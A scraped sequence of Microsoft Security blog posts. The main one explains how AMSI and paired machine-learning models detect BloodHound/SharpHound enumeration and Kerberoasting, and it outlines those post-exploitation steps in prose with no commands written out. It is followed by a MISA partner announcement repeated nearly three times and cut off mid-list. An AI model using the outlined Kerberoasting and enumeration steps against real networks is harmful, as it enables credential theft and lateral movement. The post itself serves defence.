An image showing how Attackers leverage use vulnerabilities to gain access to sensitive company resources.

Microsoft Endpoint Manager makes it easier to provision, update, and manage personal and business laptops and mobile devices with support for Windows, MacOS, iOS, and Android Enterprise. Integration with Azure AD enables employees to use Microsoft Intune Portal to enroll both corporate-owned and personal devices without helpdesk intervention. Intune automatically installs appropriate apps, or you can allow employees to choose apps through the portal.

With Microsoft Endpoint Manager, you can also enforce security policies on all enrolled devices. For example, you can require that employees use the most current operating system to access corporate resources. You can define PIN requirements or install threat protection software. If users don’t want to enroll their device, mobile app management capabilities let you isolate organizational data from personal data. These policies are defined globally and automatically applied when users register devices, streamlining the process for everyone.

An image showing how Microsoft 365 security solutions work across identities, endpoints, emails, apps, data, clouds, networks, and IOT devices

Microsoft 365 security solutions work across identities, endpoints, emails, apps, data, clouds, networks, and IoT devices to detect, block, and elevate threats. Consolidate with Microsoft to strengthen security, simplify the user experience, and reduce helpdesk costs.

To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post 3 ways Microsoft 365 can help you reduce helpdesk costs appeared first on Microsoft Security.

Stopping Active Directory attacks and other post-exploitation behavior with AMSI and machine learning

August 27th, 2020 No comments

When attackers successfully breach a target network, their typical next step is to perform reconnaissance of the network, elevate their privileges, and move laterally to reach specific machines or spread as widely as possible. For these activities, attackers often probe the affected network’s Active Directory, which manages domain authentication and permissions for resources. Attackers take advantage of users’ ability to enumerate and interact with the Active Directory for reconnaissance, which allows lateral movement and privilege escalation. This is a common attack stage in human-operated ransomware campaigns like Ryuk.

These post-exploitation activities largely rely on scripting engines like PowerShell and WMI because scripts provide attackers flexibility and enable them to blend into the normal hum of enterprise endpoint activity. Scripts are lightweight, can be disguised and obfuscated relatively easily, and can be run fileless by loading them directly in memory through command-line or interacting with scripting engines in memory.

Antimalware Scan Interface (AMSI) helps security software to detect such malicious scripts by exposing script content and behavior. AMSI integrates with scripting engines on Windows 10 as well as Office 365 VBA to provide insights into the execution of PowerShell, WMI, VBScript, JavaScript, and Office VBA macros. Behavioral blocking and containment capabilities in Microsoft Defender Advanced Threat Protection (ATP) take full advantage of AMSI’s visibility into scripts and harness the power of machine learning and cloud-delivered protection to detect and stop malicious behavior. In the broader delivery of coordinated defense, the AMSI-driven detection of malicious scripts on endpoints helps Microsoft Threat Protection, which combines signals from Microsoft Defender ATP and other solutions in the Microsoft 365 security portfolio, to detect cross-domain attack chains.

On endpoints, performance-optimized machine learning models inspect script content and behavior through AMSI. When scripts run and malicious or suspicious behavior is detected, features are extracted from the content, including expert features, features selected by machine learning, and fuzzy hashes. The lightweight client machine learning models make inferences on the content. If the content is classified as suspicious, the feature description is sent to the cloud for full real-time classification. In the cloud, heavier counterpart machine learning models analyze the metadata and uses additional signals like file age, prevalence, and other such information to determine whether the script should be blocked or not.

These pairs of AMSI-powered machine learning classifiers, one pair for each scripting engine, allow Microsoft Defender ATP to detect malicious behavior and stop post-exploitation techniques and other script-based attacks, even after they have started running. In this blog, we’ll discuss examples of Active Directory attacks, including fileless threats, foiled by AMSI machine learning.

Diagram showing pairs of machine learning models on the endpoint and in the cloud using AMSI to detect malicious scripts

Figure 1. Pair of AMSI machine learning models on the client and in the cloud

Blocking BloodHound attacks

BloodHound is a popular open-source tool for enumerating and visualizing the domain Active Directory and is used by red teams and attackers as a post-exploitation tool. The enumeration allows a graph of domain devices, users actively signed into devices, and resources along with all their permissions. Attackers can discover and abuse weak permission configurations for privilege escalation by taking over other user accounts or adding themselves to groups with high privileges, or for planning their lateral movement path to their target privileges. Attackers, including those behind human-operated ransomware campaigns such as Ryuk, use BloodHound as part of their attacks.

To work, BloodHound uses a component called SharpHound to enumerate the domain and collect various categories of data: local admin collection, group membership collection, session collection, object property collection, ACL collection, and trust collection. This enumeration would typically then be exfiltrated to be visualized and analysed by the attacker as part of planning their next steps. SharpHound performs the domain enumeration and is officially published as a fileless PowerShell in-memory version, as well as a file-based executable tool version. It is critical to identify the PowerShell fileless variant enumeration if it is active on a network.

Code snippet of the SharpHound ingestor

Figure 2. SharpHound ingestor code snippets

When the SharpHound fileless PowerShell ingestor is run in memory, whether by a pen tester or an attacker, AMSI sees its execution buffer. The machine learning model on the client featurizes this buffer and sends it to the cloud for final classification.

Code snippet of SharpHound ingestor showing featurized details

Figure 3. Sample featurized SharpHound ingestor code

The counterpart machine learning model in the cloud analyzes the metadata, integrates other signals, and returns a verdict. Malicious scripts are detected and stopped on endpoints in real time:

Screenshot of Microsoft Defender Antivirus alert for detection of SharpHound

Figure 4. Microsoft Defender Antivirus detection of SharpHound

Detections are reported in Microsoft Defender Security Center, where SOC analysts can use Microsoft Defender ATP’s rich set of tools to investigate and respond to attacks:

Screenshot of Microsoft Defender Security Center showing detection of SharpHound

Figure 5. Microsoft Defender Security Center alert showing detection of SharpHound

This protection is provided by AI that has learned to identify and block these attacks automatically, and that will continue to adapt and learn new attack methods we observe.

Stopping Kerberoasting

Kerberoasting, like BloodHound attacks, is a technique for stealing credentials used by both red teams and attackers. Kerberoasting attacks abuse the Kerberos Ticket Granting Service (TGS) to gain access to accounts, typically targeting domain accounts for lateral movement.

Kerberoasting attacks involve scanning an Active Directory environment to generate a list of user accounts that have Kerberos Service Principal Name (SPN). Attackers then request these SPN to grant Kerberos Service Tickets to these accounts. The tickets are dumped from memory using various tools like Mimikatz and then exfiltrated for offline brute forcing on the encrypted segment of the tickets. If successful, attackers can identify the passwords associated with the accounts, which they then use to remotely sign into machines or access resources.

All the Kerberoasing attack steps leading to the hash extraction can be accomplished using a single PowerShell (Invoke-Kerberoast.ps1), and has been integrated into popular post-exploitation frameworks like PowerSploit and PowerShell Empire:

Figure 6. Single command line to download and execute Kerberoasting to extract user password hashes

Code snippet of Kerberoasting

Figure 7. Kerberoasting code

Because AMSI has visibility into PowerShell scripts, when the Invoke-Kerberoast.ps1 is run, AMSI allows for inspection of the PowerShell content during runtime. This buffer is featurized and analyzed by client-side machine learning models, and sent to the cloud for real-time ML classification.

Code snippet of Kerberoasting showing featurized details

Figure 8. Sample featurized Kerberoasting code

Microsoft Defender ATP raises an alert for the detection of Invoke-Kerberoast.ps1:

Figure 9. Microsoft Defender Security Center alert showing detection of Invoke-Kerberoast.ps1

Training the machine learning models

To ensure continued high-quality detection of threats, the AMSI machine learning models are trained per scripting engine using real-time protection data and threat investigations.

Featurization is key to machine learning models making intelligent decisions about whether content is malicious or benign. For behavior-based script logs, we extract the set of libraries, COM object, and function names used by the script. Learning the most important features within the script content is performed through a combination of character ngramming the script or behavior log, followed by semi-asynchronous stochastic dual coordinate ascent (SA-SDCA) algorithm with L1 regularization feature trimming to learn and deploy the most important character ngram features.

On top of the same features used to train the client models, other complex features used to train the cloud modes include fuzzy hashes, cluster hashes, partial hashes, and more. In addition, the cloud models have access to other information like age, prevalence, global file information, reputation and others, which allow cloud models to make more accurate decisions for blocking.

Conclusion: Broad visibility informs AI-driven protections

Across Microsoft, AI and machine learning protection technologies use Microsoft’s broad visibility into various surfaces to identify new and unknown threats. Microsoft Threat Protection uses these machine learning-driven protections to detect threats across endpoints, email and data, identities, and apps.

On endpoints, Microsoft Defender ATP uses multiple next-generation protection engines that detect a wide range of threats. One of these engines uses insights from AMSI and pairs of machine learning models on the client and in the cloud working together to detect and stop malicious scripts post-execution.

These pairs of AMSI models, one pair for each scripting engine, are part of the behavior-based blocking and containment capabilities in Microsoft Defender ATP, which are designed to detect and stop threats even after they have started running. When running, threats are exposed and can’t hide behind encryption or obfuscation. This adds another layer of protection for instances where sophisticated threats are able to slip through pre-execution defenses.

Diagram showing different next-generation protection engines on the client and in the cloud

Figure 10. Microsoft Defender ATP next-generation protection engines

In this blog post, we showed how these AMSI-driven behavior-based machine learning protections are critical in detecting and stopping post-exploitation activities like BloodHound-based and Kerberoasting attacks, which employ evasive malicious scripts, including fileless components. With AMSI, script content and behavior are exposed, allowing Microsoft Defender ATP to foil reconnaissance activities and prevent attacks from progressing.

To learn more about behavior-based blocking and containment, read the following blog posts:

 

Ankit Garg and Geoff McDonald

Microsoft Defender ATP Research Team

The post Stopping Active Directory attacks and other post-exploitation behavior with AMSI and machine learning appeared first on Microsoft Security.

Microsoft Intelligent Security Association expands to include managed security service providers

July 14th, 2020 No comments

We’d planned a splashy party at Microsoft Inspire to announce our newest Microsoft Intelligent Security Association (MISA) members and introduce them to association members, but given our world today, I am instead picturing you reading this announcement curled up in a chair with a cup of coffee. Almost as satisfying, right?

Welcoming Managed Security Service Providers to MISA

Two years ago, we launched MISA to offer our customers holistic solutions that help them better defend against a world of increasing threats. Our vision was to build a robust security ecosystem that included leading security technology companies that provide value to our joint customers. We began by partnering with independent software vendors that have integrated their solutions with Microsoft. Since launch, MISA has expanded significantly—in just the last year, membership increased from 57 members to 133!

Through MISA, we’ve been able to collaborate with some of the most innovative security companies in the world, but our joint customers also need security services that are deeply interwoven with MISA software solutions. To meet this demand, MISA is launching an invitation-only pilot program in July 2020 for select managed security service providers (MSSPs).

Today we’re happy to bring a win-win-win offering by enabling MSSPs and managed detection and response partners to sell and deploy not just Microsoft’s security solutions but more importantly our joint solutions with our independent software vendor partners.”  – Eran Barak, Principle PM Manager, Microsoft Threat Protection.

By including MSSPs in the program, our joint customers will benefit from security consultants with deep expertise in MISA solutions, enabling them to get the most out of their investments. The expansion also creates more opportunities for security organizations to work together on the creative solutions we will need to confront an evolving threat landscape.

“MISA members are the cybersecurity industry leaders, unified by the common goal of helping secure our customers by offering their own valuable expertise and making the association more effective as it expands.”– Mandana Javaheri, Global Director of Cybersecurity Solutions Group at Microsoft Corp.

I am proud of the work that MISA has accomplished to date and look forward to partnering with our newest members to help our joint customers better safeguard their organizations. Please join me in welcoming the following MSSPs to MISA:

Accenture

MISA service offering: Azure Sentinel

Accenture Security helps organizations prepare, protect, detect, respond and recover along across the entire Microsoft Security portfolio across the full security lifecycle. Learn more.

AscentSolutions

MISA service offering: Azure Sentinel, Azure Security Center

Ascent Solutions’ risk-based defense strategy aligns your priorities with the right technology, processes, and route map to make your business more secure today. And because cybersecurity is at the heart of everything we do, we also help you defend against the right attack vectors and combat malicious actors to better protect your businesses into the future. Learn more.

Avanade

MISA service offering: Azure Sentinel

From enabling a modern workplace, to protecting your applications in the cloud, Avanade provides a holistic approach to security at every step. Learn more. 

BlueVoyant

MISA service offering: Azure Sentinel, Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP)

BlueVoyant provides managed detection and response (MDR) services utilizing Azure Sentinel, a cloud-native security information and event manager (SIEM), and Microsoft Threat Protection, an integrated platform that unifies best-in-class products that include Microsoft Defender ATP, Office 365 Advanced Threat Protection, Azure Advanced Threat Protection, and Microsoft Cloud Application Security. Learn more.

Born in the Cloud

MISA service offering: Azure Sentinel, Azure Security Center

Born In The Cloud leverages Azure Security services including Azure Sentinel and machine learning algorithms to monitor your environment and make sense of the data faster than any human can, allowing us to respond to threats quickly. We also manage Windows 10, Office 365, Microsoft Defender ATP and Microsoft Endpoint Manager for you, to help keep devices, data, and identities safe. All built on Azure Cloud. Learn more.

BT

MISA service offering: Azure Sentinel

One of the few local service providers in managed security services, BT Consulting uses cutting edge technology to monitor firewalls and manage endpoint security. Learn more.

Critical Start

MISA service offering: Microsoft Defender ATP, Azure Sentinel

CRITICALSTART enables customers to centralize, ingest, and correlate their logs to ensure their environment is secure. CRITICALSTART’s MDR utilizes a Trusted Behavior Registry to investigate every alert generated until they are classified as a known good and can be safely resolved. Customers see every action our CYBERSOC analysts take since our platform provides transparency across the entire process. Learn more.

Cyberproof

MISA service offering: Azure Sentinel

Cyberproof monitors your security alerts and suspicious events, collected from multiple internal and external customer data sources including Microsoft Azure Sentinel SIEM. Threats are detected as they emerge in critical cloud and on-premises infrastructure. Learn more.

Dell

MISA service offering: Microsoft Defender ATP, Azure ATP

At Dell, security is a priority – a part of every conversation; it connects our team members, customers, processes and technologies. Dell’s Security and Trust Center provides easy access to resources and solutions to help you quickly find answers to your security questions. Learn more.

Expel

MISA service offering: Microsoft Defender ATP, Azure Sentinel

The combination of the Expel Workbench™ and Expel analysts monitor your environment 24×7 to provide transparent managed security that finds attackers and gives you the answers to help you kick them out and keep them out. Learn more.

EY

MISA service offering: Microsoft Defender ATP, Azure Security Center

EY provides day-to-day resilience as well as a proactive, pragmatic, and strategic approach that considers risk and security from the onset. This is Security by Design. Rather than avoiding risk altogether, Security by Design is about enabling trust in systems, designs, and data so that organizations can take on more risk, lead transformational change, and innovate with confidence. EY Next-generation security operations and response teams can provide organizations with the right amount of support to help them manage leading-class security operations in a programmatic way.  Learn more.

FishTech

MISA service offering: Microsoft Defender ATP

Fishtech is the leading current generation cybersecurity services provider for enabling secure and successful business transformation. Data-driven and born in the cloud, Fishtech provides the people, processes, and technology to minimize risk, maintain compliance, and increase business efficiency. Our human-led, machine-driven security-as-a-service division, CYDERES, helps organizations manage cybersecurity risks, detect threats, and respond to security incidents in real-time. Learn more.

Infosys

MISA service offering: Azure Active Directory, Azure Sentinel

Infosys CyberSecurity offers a flexible managed security services model that empowers organizations with people, processes, and technology to secure their critical assets and data. With our quality services, we help protect your data and infrastructure with the latest technology and certified professionals, while adhering to the latest industry-specific compliance standards. Learn more.

Insight

MISA service offering: Azure Sentinel

Insight Services for Azure Sentinel help you take advantage of cutting-edge technology from Microsoft to strengthen and simplify your security environment. During an engagement, our consultants address all major areas of your SOC, including new tools or processes that would be beneficial to adopt. Learn more.

Inspark

MISA service offering: Azure Sentinel

The new Azure Sentinel and the Fusion capabilities empower Inspark to help keep our customers safe for the future. Our Cloud Security Center incorporates Azure Sentinel and the Microsoft Security Graph into our solution to better protect our customers. Learn more.

KPMG (US & EMEA)

MISA service offering: Azure Sentinel

The KPMG + Azure Sentinel solution has been designed to help businesses improve their security monitoring and incident response capabilities by combining KPMG’s cybersecurity, incident response, and industry experience with Microsoft’s advanced cybersecurity technologies. Learn more.

Open Systems

MISA service offering: Azure Sentinel

Open Systems designed a scalable MDR platform that helps detect threats early to limit the damage. It combines human knowhow, advanced automated threat detection, and the best sensor technology. In addition, a cloud-scale SIEM built on Microsoft Azure Sentinel ensures smooth logfile integration from your existing security controls and other sources of relevant data. Learn more.

Optiv Security

MISA service offering: Microsoft Defender ATP, Azure Sentinel, Azure Active Directory

Optiv Security is a security solutions integrator that enables clients to reduce risk by taking a strategic approach to cybersecurity. Align your security program to achieve specific business outcomes with our full suite of service capabilities, from strategy to technology—and everything in between. Our managed security services provide vetted on-staff vulnerability and security researchers and multiple operations centers to support your organization every moment, of every day, so you can refocus your existing IT staff on core business needs. Learn more.

Truesec

MISA service offering: Microsoft Defender ATP

As a leading cybersecurity consulting company, Truesec offers a wide range of services including security health checks, security engineering, and penetration testing, all provided by cyber security specialists. Our managed service will give your organization the capability to detect and respond quickly to cyberattacks. Our success is based on a combination of extraordinary cyber experts, the most advanced tools in the market today, and by investing in truly understanding the specifics of our client’s IT environments. Learn more.

Trustwave

MISA service offering:  Microsoft Defender ATP, Azure Sentinel

Trustwave Threat Detection and Response Services for Microsoft Azure uses Microsoft Security Graph API to ingest data from Microsoft Azure Sentinel and Microsoft Defender ATP to provide real-time triage, analysis, investigation, response, and remediation of security threats. Learn more.

Wipro

MISA service offering: Azure Active Directory, Azure Sentinel

Wipro provides end-to-end security solutions and services for business to enterprise, partners and consumers through Microsoft security stacks. Learn more

For more information

To learn more about the Microsoft Intelligent Security Association watch this video or visit the webpage.  To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft Intelligent Security Association expands to include managed security service providers appeared first on Microsoft Security.

Microsoft Intelligent Security Association expands to include managed security service providers

July 14th, 2020 No comments

We’d planned a splashy party at Microsoft Inspire to announce our newest Microsoft Intelligent Security Association (MISA) members and introduce them to association members, but given our world today, I am instead picturing you reading this announcement curled up in a chair with a cup of coffee. Almost as satisfying, right?

Welcoming Managed Security Service Providers to MISA

Two years ago, we launched MISA to offer our customers holistic solutions that help them better defend against a world of increasing threats. Our vision was to build a robust security ecosystem that included leading security technology companies that provide value to our joint customers. We began by partnering with independent software vendors that have integrated their solutions with Microsoft. Since launch, MISA has expanded significantly—in just the last year, membership increased from 57 members to 133!

Through MISA, we’ve been able to collaborate with some of the most innovative security companies in the world, but our joint customers also need security services that are deeply interwoven with MISA software solutions. To meet this demand, MISA is launching an invitation-only pilot program in July 2020 for select managed security service providers (MSSPs).

Today we’re happy to bring a win-win-win offering by enabling MSSPs and managed detection and response partners to sell and deploy not just Microsoft’s security solutions but more importantly our joint solutions with our independent software vendor partners.”  – Eran Barak, Principle PM Manager, Microsoft Threat Protection.

By including MSSPs in the program, our joint customers will benefit from security consultants with deep expertise in MISA solutions, enabling them to get the most out of their investments. The expansion also creates more opportunities for security organizations to work together on the creative solutions we will need to confront an evolving threat landscape.

“MISA members are the cybersecurity industry leaders, unified by the common goal of helping secure our customers by offering their own valuable expertise and making the association more effective as it expands.”– Mandana Javaheri, Global Director of Cybersecurity Solutions Group at Microsoft Corp.

I am proud of the work that MISA has accomplished to date and look forward to partnering with our newest members to help our joint customers better safeguard their organizations. Please join me in welcoming the following MSSPs to MISA:

Accenture

MISA service offering: Azure Sentinel

Accenture Security helps organizations prepare, protect, detect, respond and recover along across the entire Microsoft Security portfolio across the full security lifecycle. Learn more.

AscentSolutions

MISA service offering: Azure Sentinel, Azure Security Center

Ascent Solutions’ risk-based defense strategy aligns your priorities with the right technology, processes, and route map to make your business more secure today. And because cybersecurity is at the heart of everything we do, we also help you defend against the right attack vectors and combat malicious actors to better protect your businesses into the future. Learn more.

Avanade

MISA service offering: Azure Sentinel

From enabling a modern workplace, to protecting your applications in the cloud, Avanade provides a holistic approach to security at every step. Learn more. 

BlueVoyant

MISA service offering: Azure Sentinel, Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP)

BlueVoyant provides managed detection and response (MDR) services utilizing Azure Sentinel, a cloud-native security information and event manager (SIEM), and Microsoft Threat Protection, an integrated platform that unifies best-in-class products that include Microsoft Defender ATP, Office 365 Advanced Threat Protection, Azure Advanced Threat Protection, and Microsoft Cloud Application Security. Learn more.

Born in the Cloud

MISA service offering: Azure Sentinel, Azure Security Center

Born In The Cloud leverages Azure Security services including Azure Sentinel and machine learning algorithms to monitor your environment and make sense of the data faster than any human can, allowing us to respond to threats quickly. We also manage Windows 10, Office 365, Microsoft Defender ATP and Microsoft Endpoint Manager for you, to help keep devices, data, and identities safe. All built on Azure Cloud. Learn more.

BT

MISA service offering: Azure Sentinel

One of the few local service providers in managed security services, BT Consulting uses cutting edge technology to monitor firewalls and manage endpoint security. Learn more.

Critical Start

MISA service offering: Microsoft Defender ATP, Azure Sentinel

CRITICALSTART enables customers to centralize, ingest, and correlate their logs to ensure their environment is secure. CRITICALSTART’s MDR utilizes a Trusted Behavior Registry to investigate every alert generated until they are classified as a known good and can be safely resolved. Customers see every action our CYBERSOC analysts take since our platform provides transparency across the entire process. Learn more.

Cyberproof

MISA service offering: Azure Sentinel

Cyberproof monitors your security alerts and suspicious events, collected from multiple internal and external customer data sources including Microsoft Azure Sentinel SIEM. Threats are detected as they emerge in critical cloud and on-premises infrastructure. Learn more.

Dell

MISA service offering: Microsoft Defender ATP, Azure ATP

At Dell, security is a priority – a part of every conversation; it connects our team members, customers, processes and technologies. Dell’s Security and Trust Center provides easy access to resources and solutions to help you quickly find answers to your security questions. Learn more.

Expel

MISA service offering: Microsoft Defender ATP, Azure Sentinel

The combination of the Expel Workbench™ and Expel analysts monitor your environment 24×7 to provide transparent managed security that finds attackers and gives you the answers to help you kick them out and keep them out. Learn more.

EY

MISA service offering: Microsoft Defender ATP, Azure Security Center

EY provides day-to-day resilience as well as a proactive, pragmatic, and strategic approach that considers risk and security from the onset. This is Security by Design. Rather than avoiding risk altogether, Security by Design is about enabling trust in systems, designs, and data so that organizations can take on more risk, lead transformational change, and innovate with confidence. EY Next-generation security operations and response teams can provide organizations with the right amount of support to help them manage leading-class security operations in a programmatic way.  Learn more.

FishTech

MISA service offering: Microsoft Defender ATP

Fishtech is the leading current generation cybersecurity services provider for enabling secure and successful business transformation. Data-driven and born in the cloud, Fishtech provides the people, processes, and technology to minimize risk, maintain compliance, and increase business efficiency. Our human-led, machine-driven security-as-a-service division, CYDERES, helps organizations manage cybersecurity risks, detect threats, and respond to security incidents in real-time. Learn more.

Infosys

MISA service offering: Azure Active Directory, Azure Sentinel

Infosys CyberSecurity offers a flexible managed security services model that empowers organizations with people, processes, and technology to secure their critical assets and data. With our quality services, we help protect your data and infrastructure with the latest technology and certified professionals, while adhering to the latest industry-specific compliance standards. Learn more.

Insight

MISA service offering: Azure Sentinel

Insight Services for Azure Sentinel help you take advantage of cutting-edge technology from Microsoft to strengthen and simplify your security environment. During an engagement, our consultants address all major areas of your SOC, including new tools or processes that would be beneficial to adopt. Learn more.

Inspark

MISA service offering: Azure Sentinel

The new Azure Sentinel and the Fusion capabilities empower Inspark to help keep our customers safe for the future. Our Cloud Security Center incorporates Azure Sentinel and the Microsoft Security Graph into our solution to better protect our customers. Learn more.

KPMG (US & EMEA)

MISA service offering: Azure Sentinel

The KPMG + Azure Sentinel solution has been designed to help businesses improve their security monitoring and incident response capabilities by combining KPMG’s cybersecurity, incident response, and industry experience with Microsoft’s advanced cybersecurity technologies. Learn more.

Open Systems

MISA service offering: Azure Sentinel

Open Systems designed a scalable MDR platform that helps detect threats early to limit the damage. It combines human knowhow, advanced automated threat detection, and the best sensor technology. In addition, a cloud-scale SIEM built on Microsoft Azure Sentinel ensures smooth logfile integration from your existing security controls and other sources of relevant data. Learn more.

Optiv Security

MISA service offering: Microsoft Defender ATP, Azure Sentinel, Azure Active Directory

Optiv Security is a security solutions integrator that enables clients to reduce risk by taking a strategic approach to cybersecurity. Align your security program to achieve specific business outcomes with our full suite of service capabilities, from strategy to technology—and everything in between. Our managed security services provide vetted on-staff vulnerability and security researchers and multiple operations centers to support your organization every moment, of every day, so you can refocus your existing IT staff on core business needs. Learn more.

Truesec

MISA service offering: Microsoft Defender ATP

As a leading cybersecurity consulting company, Truesec offers a wide range of services including security health checks, security engineering, and penetration testing, all provided by cyber security specialists. Our managed service will give your organization the capability to detect and respond quickly to cyberattacks. Our success is based on a combination of extraordinary cyber experts, the most advanced tools in the market today, and by investing in truly understanding the specifics of our client’s IT environments. Learn more.

Trustwave

MISA service offering:  Microsoft Defender ATP, Azure Sentinel

Trustwave Threat Detection and Response Services for Microsoft Azure uses Microsoft Security Graph API to ingest data from Microsoft Azure Sentinel and Microsoft Defender ATP to provide real-time triage, analysis, investigation, response, and remediation of security threats. Learn more.

Wipro

MISA service offering: Azure Active Directory, Azure Sentinel

Wipro provides end-to-end security solutions and services for business to enterprise, partners and consumers through Microsoft security stacks. Learn more

For more information

To learn more about the Microsoft Intelligent Security Association watch this video or visit the webpage.  To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft Intelligent Security Association expands to include managed security service providers appeared first on Microsoft Security.

Microsoft Intelligent Security Association expands to include managed security service providers

July 14th, 2020 No comments

We’d planned a splashy party at Microsoft Inspire to announce our newest Microsoft Intelligent Security Association (MISA) members and introduce them to association members, but given our world today, I am instead picturing you reading this announcement curled up in a chair with a cup of coffee. Almost as satisfying, right?

Welcoming Managed Security Service Providers to MISA

Two years ago, we launched MISA to offer our customers holistic solutions that help them better defend against a world of increasing threats. Our vision was to build a robust security ecosystem that included leading security technology companies that provide value to our joint customers. We began by partnering with independent software vendors that have integrated their solutions with Microsoft. Since launch, MISA has expanded significantly—in just the last year, membership increased from 57 members to 133!

Through MISA, we’ve been able to collaborate with some of the most innovative security companies in the world, but our joint customers also need security services that are deeply interwoven with MISA software solutions. To meet this demand, MISA is launching an invitation-only pilot program in July 2020 for select managed security service providers (MSSPs).

Today we’re happy to bring a win-win-win offering by enabling MSSPs and managed detection and response partners to sell and deploy not just Microsoft’s security solutions but more importantly our joint solutions with our independent software vendor partners.”  – Eran Barak, Principle PM Manager, Microsoft Threat Protection.

By including MSSPs in the program, our joint customers will benefit from security consultants with deep expertise in MISA solutions, enabling them to get the most out of their investments. The expansion also creates more opportunities for security organizations to work together on the creative solutions we will need to confront an evolving threat landscape.

“MISA members are the cybersecurity industry leaders, unified by the common goal of helping secure our customers by offering their own valuable expertise and making the association more effective as it expands.”– Mandana Javaheri, Global Director of Cybersecurity Solutions Group at Microsoft Corp.

I am proud of the work that MISA has accomplished to date and look forward to partnering with our newest members to help our joint customers better safeguard their organizations. Please join me in welcoming the following MSSPs to MISA:

Accenture

MISA service offering: Azure Sentinel

Accenture Security helps organizations prepare, protect, detect, respond and recover along across the entire Microsoft Security portfolio across the full security lifecycle. Learn more.

AscentSolutions

MISA service offering: Azure Sentinel, Azure Security Center

Ascent Solutions’ risk-based defense strategy aligns your priorities with the right technology, processes, and route map to make your business more secure today. And because cybersecurity is at the heart of everything we do, we also help you defend against the right attack vectors and combat malicious actors to better protect your businesses into the future. Learn more.

Avanade

MISA service offering: Azure Sentinel

From enabling a modern workplace, to protecting your applications in the cloud, Avanade provides a holistic approach to security at every step. Learn more. 

BlueVoyant

MISA service offering: Azure Sentinel, Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP)

BlueVoyant provides managed detection and response (MDR) services utilizing Azure Sentinel, a cloud-native security information and event manager (SIEM), and Microsoft Threat Protection, an integrated platform that unifies best-in-class products that include Microsoft Defender ATP, Office 365 Advanced Threat Protection, Azure Advanced Threat Protection, and Microsoft Cloud Application Security. Learn more.

Born in the Cloud

MISA service offering: Azure Sentinel, Azure Security Center

Born In The Cloud leverages Azure Security services including Azure Sentinel and machine learning algorithms to monitor your environment and make sense of the data faster than any human can, allowing us to respond to threats quickly. We also manage Windows 10, Office 365, Microsoft Defender ATP and Microsoft Endpoint Manager for you, to help keep devices, data, and identities safe. All built on Azure Cloud. Learn more.

BT

MISA service offering: Azure Sentinel

One of the few local service providers in managed security services, BT Consulting uses cutting edge technology to monitor firewalls and manage endpoint security. Learn more.

Critical Start

MISA service offering: Microsoft Defender ATP, Azure Sentinel

CRITICALSTART enables customers to centralize, ingest, and correlate their logs to ensure their environment is secure. CRITICALSTART’s MDR utilizes a Trusted Behavior Registry to investigate every alert generated until they are classified as a known good and can be safely resolved. Customers see every action our CYBERSOC analysts take since our platform provides transparency across the entire process. Learn more.

Cyberproof

MISA service offering: Azure Sentinel

Cyberproof monitors your security alerts and suspicious events, collected from multiple internal and external customer data sources including Microsoft Azure Sentinel SIEM. Threats are detected as they emerge in critical cloud and on-premises infrastructure. Learn more.

Dell

MISA service offering: Microsoft Defender ATP, Azure ATP

At Dell, security is a priority – a part of every conversation; it connects our team members, customers, processes and technologies. Dell’s Security and Trust Center provides easy access to resources and solutions to help you quickly find answers to your security questions. Learn more.

Expel

MISA service offering: Microsoft Defender ATP, Azure Sentinel

The combination of the Expel Workbench™ and Expel analysts monitor your environment 24×7 to provide transparent managed security that finds attackers and gives you the answers to help you kick them out and keep them out. Learn more.

EY

MISA service offering: Microsoft Defender ATP, Azure Security Center

EY provides day-to-day resilience as well as a proactive, pragmatic, and strategic approach that considers risk and security from the onset. This is Security by Design. Rather than avoiding risk altogether, Security by Design is about enabling trust in systems, designs, and data so that organizations can take on more risk, lead transformational change, and innovate with confidence. EY Next-generation security operations and response teams can provide organizations with the right amount of support to help them manage leading-class security operations in a programmatic way.  Learn more.

FishTech

MISA service offering: Microsoft Defender ATP

Fishtech is the leading current generation cybersecurity services provider for enabling secure and successful business transformation. Data-driven and born in the cloud, Fishtech provides the people, processes, and technology to minimize risk, maintain compliance, and increase business efficiency. Our human-led, machine-driven security-as-a-service division, CYDERES, helps organizations manage cybersecurity risks, detect threats, and respond to security incidents in real-time. Learn more.

Infosys

MISA service offering: Azure Active Directory, Azure Sentinel

Infosys CyberSecurity offers a flexible managed security services model that empowers organizations with people, processes, and technology to secure their critical assets and data. With our quality services, we help protect your data and infrastructure with the latest technology and certified professionals, while adhering to the latest industry-specific compliance standards. Learn more.

Insight

MISA service offering: Azure Sentinel

Insight Services for Azure Sentinel help you take advantage of cutting-edge technology from Microsoft to strengthen and simplify your security environment. During an engagement, our consultants address all major areas of your SOC, including new tools or processes that would be beneficial to adopt. Learn more.

Inspark

MISA service offering: Azure Sentinel

The new Azure Sentinel and the Fusion capabilities empower Inspark to help keep our customers safe for the future. Our Cloud Security Center incorporates Azure Sentinel and the Microsoft Security Graph into our solution to better protect our customers. Learn more.

KPMG (US & EMEA)

MISA service offering: Azure Sentinel

The KPMG + Azure Sentinel solution has been designed to help businesses improve their security monitoring and incident response capabilities by combining KPMG’s cybersecurity, incident response, and industry experience with Microsoft’s advanced cybersecurity technologies. Learn more.

Open Systems

MISA service offering: Azure Sentinel

Open Systems designed a scalable MDR platform that helps detect threats early to limit the damage. It combines human knowhow, advanced automated threat detection, and the best sensor technology. In addition, a cloud-scale SIEM built on Microsoft Azure Sentinel ensures smooth logfile integration from your existing security controls and other sources of relevant data. Learn more.

Optiv Security

MISA service offering: Microsoft Defender ATP, Azure Sentinel, Azure Active Directory

Optiv Security is a security solutions integrator that enables clients to reduce risk by taking a strategic approach to cybersecurity. Align your security program to achieve specific business outcomes with our full suite of service capabilities, from strategy to technology—and everything in between. Our managed security services provide vetted on-staff vulnerability and security researchers and multiple operations centers to support your organization every moment, of every day, so you can refocus your existing IT staff on core business needs. Learn more.

Truesec

MISA service offering: Microsoft Defender ATP

